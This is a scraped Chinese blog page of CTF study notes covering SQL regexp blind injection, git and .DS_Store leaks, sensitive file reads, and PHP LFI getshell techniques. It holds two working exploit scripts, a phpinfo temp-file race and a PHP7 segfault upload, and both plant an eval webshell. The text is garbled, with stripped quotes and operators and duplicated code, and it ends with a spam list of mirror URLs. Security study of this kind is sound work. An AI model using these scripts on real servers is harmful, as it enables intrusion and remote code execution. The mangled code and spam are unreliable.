当前位置: 首页 > news >正文

个人网站免费申请如果在wordpress

个人网站免费申请,如果在wordpress,做门用什么网站好,浙江网站建设专家评价1.做的题目 [RootersCTF2019]I_#xff1c;3_Flask_双层小牛堡的博客-CSDN博客 [NCTF2019]SQLi regexp 盲注-CSDN博客 [网鼎杯 2018]Comment git泄露 / 恢复 二次注入 .DS_Store bash_history文件查看-CSDN博客 PHP LFI 利用临时文件Getshell_双层小牛堡的博客-CSDN博客 …1.做的题目 [RootersCTF2019]I_3_Flask_双层小牛堡的博客-CSDN博客 [NCTF2019]SQLi regexp 盲注-CSDN博客 [网鼎杯 2018]Comment git泄露 / 恢复 二次注入 .DS_Store bash_history文件查看-CSDN博客 PHP LFI 利用临时文件Getshell_双层小牛堡的博客-CSDN博客 [NPUCTF2020]ezinclude 文件包含两大 getshell方式-CSDN博客 Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤-CSDN博客 2.知识点 参数爆破 首先就是对网站进行基本的信息收集 但是备份扫描抓包 都没有效果的时候可以进行参数爆破 通过工具 arjun可以爆破 arjun -u url -m GET -c 100 -d 5这里是通过慢速 来实现爆破 100个一组 延迟时间为 5 SQL正则盲注  regexp sql题一般我先进行fuzz 然后进行测试注入 这里给出一个知识点 转义符 \ 构造闭合 select * from username \ and password ;这里的 \ 可以让 username 绕过 因为我们的注入点是在password上这里解释一下 转义符这里没有过滤 所以我们可以rang \ 变为select * from username \ and password #这个时候 字符串 and password 就被外面两个 闭合了所以我们构造 ||1 就可以变为\ and password ||1#这里大家直接去phpmyadmin尝试即可 绕过空格 /**/ 或者 %09 都可以 正则盲注 这里放出了正则和 ^ 原理是 假设我的表名为adminselect * from username \ and password || password regexp ^a后面的 ^a 是开头为 a 的就返回 true 所以我们可以进行盲注这里还需要00截断后面的引号 但是我们盲注需要通过python 所以这里也介绍一下python的库 python库 首先是 string这里我们就不需要指定 37-128直接通过这个库就可以将可打印的字符输出 然后就是-00截断的库 from urllib import parse这个库是url编码a parse.unquote(%00)这里就是post的url编码后的00截断 GIT泄露 首先通过扫描可以发现存在git泄露 然后通过工具实现 https://gitcode.net/mirrors/BugScanTeam/GitHack?utm_sourcecsdn_github_accelerator 然后发现存在的代码是出错的 这里就可以通过 .git文件来恢复数据 GIT数据恢复 首先查看日志git log -all然后通过指定就可以恢复成以前的代码git reset --hard 字符 二次注入的危险函数 addslashes 将输入转变为字符串 原封不动存入数据库 这里的注入闭合 文章里面写的比较详细了 大家去看就可以了 任意文件读取 做这个题的时候 知道任意文件读取是高危 但是确实不知道去看什么比较好 /proc/self/environ /proc/self/cmdline/etc/passwd 查看存在的用户/home/用户/.bash_history 查看该用户的历史命令 .DS_Store泄露 获取内容了 因为 .DS_Store 存在很多不可见字符 所以我们可以通过hex输出 然后通过瑞士军刀 解密 并且作为文件输出 然后通过工具Python-dsstore-master 来解密获取 PHP LFI getshell 这里确实学到了很多东西 这里的前提都是存在文件包含 存在phpinfo() 如果存在phpinfo界面 我们通过对phpinfo不断发送垃圾包 其中的内容中包含着木马 这个时候我们上传的临时文件就会保存在 临时文件目录下 并且通过linux和win的命名规则存储 我们只需要去包含 就会生成木马 这里只需要通过条件竞争即可 #!/usr/bin/python3 import sys import threading import socketdef setup(host, port):TAG 安全测试PAYLOAD %s\r ?php file_put_contents(/tmp/shell, ?eval($_REQUEST[1])?)?\r % TAGREQ1_DATA -----------------------------7dbff1ded0714\r Content-Disposition: form-data; namedummyname; filenametest.txt\r Content-Type: text/plain\r \r %s -----------------------------7dbff1ded0714--\r % PAYLOADpadding A * 5000REQ1 POST /phpinfo.php?a padding HTTP/1.1\r Cookie: PHPSESSIDq249llvfromc1or39t6tvnun42; othercookie padding \r HTTP_ACCEPT: padding \r HTTP_USER_AGENT: padding \r HTTP_ACCEPT_LANGUAGE: padding \r HTTP_PRAGMA: padding \r Content-Type: multipart/form-data; boundary---------------------------7dbff1ded0714\r Content-Length: %s\r Host: %s\r \r %s % (len(REQ1_DATA), host, REQ1_DATA)# modify this to suit the LFI scriptLFIREQ GET /lfi.php?file%s HTTP/1.1\r User-Agent: Mozilla/4.0\r Proxy-Connection: Keep-Alive\r Host: %s\r \r \r return (REQ1, TAG, LFIREQ)def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s2 socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s2.connect((host, port))s.send(phpinforeq.encode())d bwhile len(d) offset:d s.recv(offset)try:i d.index(b[tmp_name] gt; )fn d[i 17:i 31]except ValueError:return Nones2.send((lfireq % (fn.decode(), host)).encode())d s2.recv(4096)s.close()s2.close()if d.find(tag.encode()) ! -1:return fn.decode()counter 0class ThreadWorker(threading.Thread):def __init__(self, e, l, m, *args):threading.Thread.__init__(self)self.event eself.lock lself.maxattempts mself.args argsdef run(self):global counterwhile not self.event.is_set():with self.lock:if counter self.maxattempts:returncounter 1try:x phpInfoLFI(*self.args)if self.event.is_set():breakif x:print(\n成功Shell已创建在 /tmp/shell)self.event.set()except socket.error:returndef getOffset(host, port, phpinforeq):获取php输出中tmp_name的偏移量s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(phpinforeq.encode())d bwhile True:i s.recv(4096)d iif i b:break# detect the final chunkif i.endswith(b0\r\n\r\n):breaks.close()i d.find(b[tmp_name] gt; )if i -1:raise ValueError(在phpinfo输出中未找到php tmp_name)print(在位置 %i 找到 %s % (i, d[i:i 10].decode()))# 加一些填充return i 256def main():print(LFI With PHPInfo())print(- * 30)if len(sys.argv) 2:print(用法%s 主机 [端口] [线程数] % sys.argv[0])sys.exit(1)try:host socket.gethostbyname(sys.argv[1])except socket.error as e:print(主机名 %s 无效请确保输入正确的主机名或IP地址。 % sys.argv[1])host socket.gethostbyname(sys.argv[1])except socket.error as e:print(主机名 %s 无效请确保输入正确的主机名或IP地址。 % sys.argv[1])sys.exit(1)port int(sys.argv[2]) if len(sys.argv) 2 else 80numthreads int(sys.argv[3]) if len(sys.argv) 3 else 10phpinforeq, tag, lfireq setup(host, port)offset getOffset(host, port, phpinforeq)print(\n[*] 开始进行LFI攻击...)threads []e threading.Event()l threading.Lock()try:for i in range(numthreads):t ThreadWorker(e, l, 100, host, port, phpinforeq, offset, lfireq, tag)threads.append(t)t.start()while not e.is_set():try:e.wait(1)except KeyboardInterrupt:print(\n[*] 收到中断信号正在停止攻击...)e.set()except socket.error as e:print(连接错误%s % str(e))for t in threads:t.join()print(\n[*] 攻击结束。)if __name__ __main__:main() 大家还是读读上面代码 也能学到内容 PHP7 Segment Falut 首先是 php7 的一个漏洞 通过特定伪协议包含文件会发生段错误 这个时候上传的文件会保存在临时文件下 并且不会被删除php://filter/sring.strip_tags 存在dir类型的页面 我们只需要去包含里面的漏洞文件即可 不存在dir类型页面 通过爆破实现即可 下面是存在dir页面的时候的脚本 # -*- coding: utf-8 -*- import re import requests from io import BytesIO# 定义漏洞URL和文件路径 vul_url http://localhost/index.php?filephp://filter/string.strip_tags/resourceC:/Windows/win.ini url2 http://localhost/dir.php# 构建文件 files {file: BytesIO(?php eval($_REQUEST[1]);?)}# 发送漏洞利用请求 req requests.post(urlvul_url, filesfiles, allow_redirectsFalse) req2 requests.get(urlurl2) # 获取临时文件名 content1 re.search(rphp[a-zA-Z0-9]{1,}.tmp, req2.content).group(0)# 构建获取目录列表的URL url3 http://localhost/index.php?fileC:/Windows/{}.format(content1)# 构建命令 data {1: system(dir); }# 发送获取目录列表的请求 req3 requests.post(urlurl3, datadata)# 输出结果 print u目录列表\n{}.format(req3.text) SESSION LIF getshell HAVE SESSION 一样 需要存在文件包含漏洞 这里是通过session 用户会话getshell 首先我们发送存在session的包的时候 会在session存储位置保存着session文件 取名是为 sess_输入 Cookie: PHPSESSID输入 一般处理会话 要么是通过 原始输入 要么就是通过序列化输入 如果不对用户会话文件进行处理 那么我们只需要写入一句话即可 如果对用户会话进行base64加密 那么我们只需要 构造 4个字符一组的方式 解密即可 记住要过滤掉特殊字符 NO SESSION 当session没有开启的时候 我们可以通过php的特性 文件上传的时候 传递 session.upload_progress.name:?php phpinfo();?这个内容是可控的 并且原本文件上传就存在 如果还发送一次 就开启session 并且存入临时文件 这里的流程图为 文件上传 ---设置session ----- 传递session.upload_progress.name 造成session开启 存入内容 这里去看原本的文章更加详细 SQL过滤许多的盲注 这道题确实过滤了巨多东西 这里的知识点 方法一 select substr(flag,1)----flagselect substr(flag,2)----lag然后我们只需要两次substr 并且倒装输出即可select reverse(substr(flag,1)) ----galfselect substr(reverse(substr(flag,1)),4)-----fselect substr(reverse(substr(flag,1)),3)-----fl然后盲注过滤了 号  我们可以通过 不等号实现 1 1 返回false1 2 返回 true 因为过滤了查询列名和表名的系统库 所以这里直接通过 字典爆破即可 方法二 通过 减去 来实现 aor((ascii(substr((select(password))from(1)))-48))--这里也是因为 过滤了 号 这里也推荐大家去看上面文章 写的详细 这里只是简单的记录 3.不足 这些题 混在一起 我就有点没想到 git那种题目的确实很简单 但是确实也是没有想到 4.下一周计划 专心准备比赛
文章转载自:
http://www.morning.kbyp.cn.gov.cn.kbyp.cn
http://www.morning.jhswp.cn.gov.cn.jhswp.cn
http://www.morning.kxsnp.cn.gov.cn.kxsnp.cn
http://www.morning.rgdcf.cn.gov.cn.rgdcf.cn
http://www.morning.kwjyt.cn.gov.cn.kwjyt.cn
http://www.morning.rhfbl.cn.gov.cn.rhfbl.cn
http://www.morning.pwdmz.cn.gov.cn.pwdmz.cn
http://www.morning.mjbnp.cn.gov.cn.mjbnp.cn
http://www.morning.zxdhp.cn.gov.cn.zxdhp.cn
http://www.morning.ymjrg.cn.gov.cn.ymjrg.cn
http://www.morning.xjmpg.cn.gov.cn.xjmpg.cn
http://www.morning.pgggs.cn.gov.cn.pgggs.cn
http://www.morning.mlffg.cn.gov.cn.mlffg.cn
http://www.morning.rwnx.cn.gov.cn.rwnx.cn
http://www.morning.cwlxs.cn.gov.cn.cwlxs.cn
http://www.morning.wphzr.cn.gov.cn.wphzr.cn
http://www.morning.mhnrx.cn.gov.cn.mhnrx.cn
http://www.morning.zlrrj.cn.gov.cn.zlrrj.cn
http://www.morning.lbxcc.cn.gov.cn.lbxcc.cn
http://www.morning.xbzfz.cn.gov.cn.xbzfz.cn
http://www.morning.xkhxl.cn.gov.cn.xkhxl.cn
http://www.morning.cbmqq.cn.gov.cn.cbmqq.cn
http://www.morning.dsxgc.cn.gov.cn.dsxgc.cn
http://www.morning.cknrs.cn.gov.cn.cknrs.cn
http://www.morning.dkfrd.cn.gov.cn.dkfrd.cn
http://www.morning.ktntj.cn.gov.cn.ktntj.cn
http://www.morning.lxcwh.cn.gov.cn.lxcwh.cn
http://www.morning.jbtzx.cn.gov.cn.jbtzx.cn
http://www.morning.bwgrd.cn.gov.cn.bwgrd.cn
http://www.morning.0small.cn.gov.cn.0small.cn
http://www.morning.mnqg.cn.gov.cn.mnqg.cn
http://www.morning.bpmdn.cn.gov.cn.bpmdn.cn
http://www.morning.zwmjq.cn.gov.cn.zwmjq.cn
http://www.morning.pgkpt.cn.gov.cn.pgkpt.cn
http://www.morning.hqykb.cn.gov.cn.hqykb.cn
http://www.morning.ljdjn.cn.gov.cn.ljdjn.cn
http://www.morning.pwwjs.cn.gov.cn.pwwjs.cn
http://www.morning.rtbj.cn.gov.cn.rtbj.cn
http://www.morning.nwgkk.cn.gov.cn.nwgkk.cn
http://www.morning.cnxpm.cn.gov.cn.cnxpm.cn
http://www.morning.jpkhn.cn.gov.cn.jpkhn.cn
http://www.morning.rwmp.cn.gov.cn.rwmp.cn
http://www.morning.xphls.cn.gov.cn.xphls.cn
http://www.morning.yhjlg.cn.gov.cn.yhjlg.cn
http://www.morning.dxpqd.cn.gov.cn.dxpqd.cn
http://www.morning.rkmsm.cn.gov.cn.rkmsm.cn
http://www.morning.jrbyz.cn.gov.cn.jrbyz.cn
http://www.morning.8yitong.com.gov.cn.8yitong.com
http://www.morning.rxlk.cn.gov.cn.rxlk.cn
http://www.morning.xbrxk.cn.gov.cn.xbrxk.cn
http://www.morning.qfmcm.cn.gov.cn.qfmcm.cn
http://www.morning.qytby.cn.gov.cn.qytby.cn
http://www.morning.qtbnm.cn.gov.cn.qtbnm.cn
http://www.morning.nxfuke.com.gov.cn.nxfuke.com
http://www.morning.jksgy.cn.gov.cn.jksgy.cn
http://www.morning.pqsys.cn.gov.cn.pqsys.cn
http://www.morning.bynf.cn.gov.cn.bynf.cn
http://www.morning.qmzwl.cn.gov.cn.qmzwl.cn
http://www.morning.gtxrw.cn.gov.cn.gtxrw.cn
http://www.morning.ktlfb.cn.gov.cn.ktlfb.cn
http://www.morning.rxxdk.cn.gov.cn.rxxdk.cn
http://www.morning.trqzk.cn.gov.cn.trqzk.cn
http://www.morning.hsdhr.cn.gov.cn.hsdhr.cn
http://www.morning.dfmjm.cn.gov.cn.dfmjm.cn
http://www.morning.pbknh.cn.gov.cn.pbknh.cn
http://www.morning.zwgrf.cn.gov.cn.zwgrf.cn
http://www.morning.lywys.cn.gov.cn.lywys.cn
http://www.morning.mdjtk.cn.gov.cn.mdjtk.cn
http://www.morning.pxspq.cn.gov.cn.pxspq.cn
http://www.morning.cnxpm.cn.gov.cn.cnxpm.cn
http://www.morning.gftnx.cn.gov.cn.gftnx.cn
http://www.morning.xwbld.cn.gov.cn.xwbld.cn
http://www.morning.mwbqk.cn.gov.cn.mwbqk.cn
http://www.morning.rykgh.cn.gov.cn.rykgh.cn
http://www.morning.zfwjh.cn.gov.cn.zfwjh.cn
http://www.morning.jkbqs.cn.gov.cn.jkbqs.cn
http://www.morning.qdsmile.cn.gov.cn.qdsmile.cn
http://www.morning.rbgwj.cn.gov.cn.rbgwj.cn
http://www.morning.fqtdz.cn.gov.cn.fqtdz.cn
http://www.morning.hrpjx.cn.gov.cn.hrpjx.cn
http://www.tj-hxxt.cn/news/268658.html

相关文章:

  • 网站建设8万属于资产吗个人微企业网站模板
  • 品牌网站建设公司排名网站建设发布实训总结
  • 网站做的好赚钱吗长沙市师德师风建设网站
  • 网站建设的优势何江建设网站要求和注意事项
  • 魏县审批建设的网站图案logo设计
  • 做poster网站平面设计师证书考试官网
  • 莲花网站建设品牌vi设计是什么意思
  • 优秀国外设计网站无锡万度网站建设
  • 网站开发主要工作内容wordpress 干净主题
  • 商城网站建设目的给赌场做网站
  • 无锡市政建设集团有限公司网站网站建设的技术阶段
  • 做 个收废品网站在运营中seo是什么意思
  • 网站建设及验收标准腾讯短链接
  • 40个免费网站推广平台电脑网站怎么制作
  • 工厂做网站有用吗工商注册号是什么
  • 什么网站个人可以建设想建设个人网站去那里建设
  • 专科网站开发简历黑龙江建设厅网站首页
  • 太原cms建站学做网站好学吗
  • 网站在备案期间怎么建设如何在电脑上登录wordpress
  • 昌吉州建设局网站如何做网页跳转
  • 网站建设咨询服务合同wordpress缓存文章页
  • flash 的网站汕头模板网建站
  • 网站域名列表wordpress公众号管理
  • 如何做网站性能优化深圳建网站技术
  • 网站深度功能北京专业建网站的公司
  • 网站问卷调查系统怎么做网站建设材料汇报
  • 海南省建设培训与执业资格注册中心网站沈阳网站备案查询
  • 网站建设技能考试试题企业网站建设方案精英
  • 重庆高端网站设计网站建设中 翻译
  • 一站式服务宣传语国外企业网站建设模型